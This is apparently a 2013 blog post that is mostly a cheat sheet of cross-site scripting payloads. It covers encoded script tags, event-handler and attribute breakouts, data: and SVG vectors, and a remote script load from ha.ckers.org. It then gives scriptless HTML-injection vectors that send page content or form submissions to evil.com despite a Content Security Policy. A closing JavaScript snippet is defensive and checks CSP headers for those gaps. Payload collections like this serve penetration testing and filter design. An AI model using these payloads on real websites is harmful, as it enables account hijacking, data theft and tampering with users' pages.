Wednesday, June 19, 2013

XSS Vectors:
Some are from OWASP, some from other places...
 
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
>"><script>alert("XSS")</script>&
<body background="javascript: alert()">"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
<script>alert(1)</script>
'</title><script>alert(1)<script>'</title>
<!-- lorem ipsum --><script>alert(1)<script>-->
<FOO><![CDATA[]]><script>alert(1)</script>]]>
<input type=text name=foo value=a><script>alert(1)<script>>
<input type=text name=foo value=a/><script>alert(1)<script>>
<input type=text name=foo value=""onevent=?//">

"><bgsound src="javascript: alert()">"><iframe src="javascript: alert()"></iframe>
</textarea><iframe src="javascript: alert()"></iframe>
</textarea><bgsound src="javascript: alert()">
<script> var foo="";alert(1);//";
<script> var foo='';alert(1);//'
<sCrIpT>alert('eoin');</ScRiPt>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
#<img/src=%22%22onerror=alert(1)>
<img/src=""onerror=alert(123)>
<a" href" onclick=alert(123)>foo</a>
<a"" href=""onclick=alert(123)>foo</a>
<img%0a%0dsrc=""%0a%0donerror=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type="text" name="foo" value=""onmouseover=alert(123)//">
<input type='text' name='foo' value=''onclick=alert(123)//'>
<input type="text" name="foo" value=""autofocus/onfocus=alert(123)//">
<a href="data:text/html,<script>alert(123)</script>">foo</a>
<script src="data:,alert(123)"></script>
<script src="data:application/x-javascript,alert(123)"></script>
<script src="data:text/javascript,alert(123)"></script>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg">foo</a>
<script src="data:;base64,YWxlcnQoOSk"></script>
<a href="data:text/html;charset=utf-16,%ff%fe%3cscript%3ealert(9)</script>?>foo</a>
<svg onload="javascript:alert(123)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(123)"></g></svg>
<svg><script xlink:href=data:,alert(123)></script>
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(123)"><rect width="1000" height="1000" fill="white"/></a></svg>
<script%0a%0dalert(123)</script>
<script%20<!--%20-->alert(123)</script>
<a href=""&<img&amp;/onclick=alert(123)>foo</a>
<a""id=a href="onclick=alert(123)>foo</a>
<a href=""&amp;/onclick=alert(123)>foo</a>
<script/id="a">alert(123)</script>
<img src=">"onerror=alert(123)>
<img id="><"class="><"src=">"onerror=alert(123)>
<img src="\"a=">"onerror=alert(123)>
<a id=' href="">'href=javascript:alert(123)>foo</a>
<a id='href=http://web.site/'onclick=alert(123)>foo</a>
<a href= . '"\' onclick=alert(123) '"'>foo</a>
<img src="\"'<a href='">"'onerror=alert(123)>
<a id='http://web.site/'onclick=alert(123)<!--href=a>foo</a>-->
<img src="'"id='<img src="">'onerror=alert(123)>
<img src="<img src='<img src=.>'>"onerror=alert(123)>
<a href=javascript:alert(123) href href=" href="">foo</a>
var a = "foo"+alert(123)//";
var a = "foo"&&alert(123)//";
var a = "foo"/alert(123)//";
(function(){alert(123)})()
window["alert"](123)
String.fromCharCode(0x61,0x62)
alert(/foo bar/.source)
window[/alert/.source](123)
angular.bind(self, alert, 123)()
angular.element.apply(alert(123))
Ember.run(null, alert, 123)
_.defer(alert, 123)
"+alert(123)//
"&&alert(123)//
"/alert(123)//
/foo bar/.source
/alert/.source
">, alert(123)<iframe/src=http://xssed.com>alert(123)</scrihttp://pt>alert(123)
">, '></div>alert(123)<input><script>alert(123)</script></marquee>alert(123)">
>">, </p>alert(123)<marquee><script>alert(123)</script></title>alert(123)
"/>, </ScRiPt>alert(123)<title><script>alert(123)</script></SCRIPT>alert(123)
>">, </form>alert(123)<b><script>alert(123)</script></input>alert(123)" t type="hidden" />

 
 
HTML Injection Vectors (Anti-CSP):
These vectors need no script execution, so a Content Security Policy that only restricts script does not stop them.
 
Unterminated single quote:
Exfiltrates the HTML following the injection point, up to the next single quote, as part of the image request to the attacker's server.
 
<img src='http://evil.com/log.do?
 
<base> Jumping:
Can be used to reroute forms whose action is a relative (non-absolute) path.
Does not work in IE (it obeys the W3C rule that <base> belongs in <head>).

<base href='http://evil.com/'> <!-- injected code -->

Form rerouting:
Forms can't be nested. Injecting a form before the legitimate form reroutes that form's submission to the injected destination.

<form action='http://evil.com/log.do'> <!-- injected markup -->
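As an added example (not part of the original post), the script below parses a Content-Security-Policy header and reports which of the three scriptless vectors in this section the policy still leaves open; the policy strings it evaluates are constructed samples.

```javascript
// Added example, not from the original post: map a CSP header onto the three
// scriptless HTML injection vectors above. Fallback rules follow the CSP spec:
// img-src falls back to default-src, but base-uri and form-action do NOT, so a
// policy built only from default-src/script-src leaves <base> jumping and form
// rerouting wide open even though inline script is blocked.

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // Browsers honour the first occurrence of a directive and ignore repeats.
    if (!(name in policy)) policy[name] = tokens.slice(1);
  }
  return policy;
}

// Coarse heuristic: can the browser reach an attacker-chosen host under this
// source list? Absent directive (and no fallback) => yes; empty list acts as
// 'none' => no; '*' or a bare scheme source such as https: => yes;
// 'self' / 'none' / a named host => no.
function allowsArbitraryHost(sources) {
  if (sources === undefined) return true;
  if (sources.length === 0) return false;
  return sources.some(s => {
    const v = s.replace(/^'|'$/g, '').toLowerCase();
    return v === '*' || v === 'http:' || v === 'https:' || /^https?:\/\/\*$/.test(v);
  });
}

function htmlInjectionExposure(header) {
  const p = parseCsp(header);
  return {
    // <img src='http://evil.com/log.do?   -> img-src (falls back to default-src)
    danglingImgExfil: allowsArbitraryHost(p['img-src'] ?? p['default-src']),
    // <base href='http://evil.com/'>      -> base-uri only, no fallback
    baseJumping: allowsArbitraryHost(p['base-uri']),
    // <form action='http://evil.com/log.do'> -> form-action only, no fallback
    formRerouting: allowsArbitraryHost(p['form-action']),
  };
}

// Constructed sample policies (assumed for illustration, not from any real site).
const WEAK_CSP = "default-src 'self'; script-src 'self' 'nonce-r4nd0m'";
const HARDENED_CSP = WEAK_CSP + "; base-uri 'none'; form-action 'self'";

console.log('weak    :', htmlInjectionExposure(WEAK_CSP));
console.log('hardened:', htmlInjectionExposure(HARDENED_CSP));
```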